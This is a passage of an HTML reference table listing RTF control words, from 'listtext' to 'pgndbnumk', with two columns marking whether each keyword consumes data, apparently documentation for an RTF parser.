<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listtext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">lnbrkrule</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lndscpsxn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lnongrid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">loch</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lsdlockedexcept</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ltrch</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ltrdoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ltrpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ltrrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ltrsect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lvltentative</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lytcalctblwd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lytexcttp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lytprtmet</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lyttblrtgr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">macc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">maccPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">macpict</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mailmerge</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">makebackup</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">maln</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">malnScr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">manager</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">margPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">margmirror</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">margmirsxn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mbar</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mbarPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mbaseJc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mbegChr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mborderBox</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mborderBoxPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mbox</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mboxPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mchr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mcount</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mctrlPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">md</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mdPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mdeg</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mdegHide</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mden</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mdiff</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">me</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mendChr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">meqArr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">meqArrPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mf</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mfName</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mfPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mfunc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mfuncPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mgroupChr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mgroupChrPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mgrow</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhideBot</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhideLeft</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhideRight</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhideTop</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mhtmltag</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimLow</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimloc</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimlow</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimlowPr</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimupp</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlimuppPr</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mlit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mm</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmaddfieldname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmath</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmathPict</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmathPr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmattach</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmaxdist</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmblanklines</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmcJc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmcPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmconnectstr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmconnectstrdata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmcs</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmdatasource</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmdatatypeaccess</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypeexcel</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypefile</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypeodbc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypeodso</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdatatypeqt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdefaultsql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdestemail</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdestfax</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdestnewdoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmdestprinter</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypeaddress</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypebarcode</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypedbcolumn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypemapped</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypenull</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmfttypesalutation</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmheadersource</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmlinktoquery</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmailsubject</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmmaintypecatalog</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypeemail</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypeenvelopes</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypefax</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypelabels</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmmaintypeletters</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mmodso</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsofilter</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsofldmpdata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsomappedname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsoname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsorecipdata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsosort</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsosrc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsotable</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsoudl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsoudldata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmodsouniquetag</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmquery</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mmshowdata</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mnary</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mnaryPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mnoBreak</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mnor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mnum</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">moMath</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">moMathPara</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">moMathParaPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mobjDist</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mopEmu</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mphant</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mphantPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mplcHide</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mpos</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mrPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mrad</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mradPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msPre</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msPrePr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSub</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSubPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSubSup</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSubSupPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSup</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msSupPr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msepChr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mshow</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mshp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msmcap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mstrikeBLTR</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mstrikeH</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mstrikeTLBR</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mstrikeV</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msub</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msubHide</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msup</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">msupHide</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mtransp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mtype</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">muser</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mvertJc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mvf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mvfmf</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mvfml</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mvt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">mvtof</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mvtol</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mzeroAsc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mzeroDesc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">mzeroWid</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">nesttableprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">newtblstyruls</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nextfile</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">noafcnsttbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nobrkwrptbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nocolbal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nocompatoptions</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nocwrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nocxsptable</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noextrasprl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nofeaturethrottle</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nogrowautofit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noindnmbrts</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nojkernpunct</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nolead</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noline</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nolnhtadjtbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nonesttables</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">nonshppict</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">nooverflow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noproof</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noqfpromote</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nosectexpand</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">nosnaplinegrid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nospaceforul</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nosupersub</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">notabind</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">notbrkcnstfrctbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">notcvasp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">notvatxbx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nouicompat</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noultrlspc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nowidctlpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nowrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">nowwrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">noxlattoyen</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objalias</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objattph</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objautlink</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objclass</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objdata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">object</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objemb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objhtml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objicemb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objlink</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objlock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objocx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objpub</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objsect</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objsetsize</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">objsub</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objtime</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">objupdate</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">oldas</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">oldcprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">oldlinewrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">oldpprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">oldsprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">oldtprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">oleclsid</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">operator</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">otblrul</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">overlay</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pagebb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">panose</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pard</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">password</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">passwordhash</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pca</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrfoot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrhead</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrsnap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnbidia</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnbidib</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgncont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
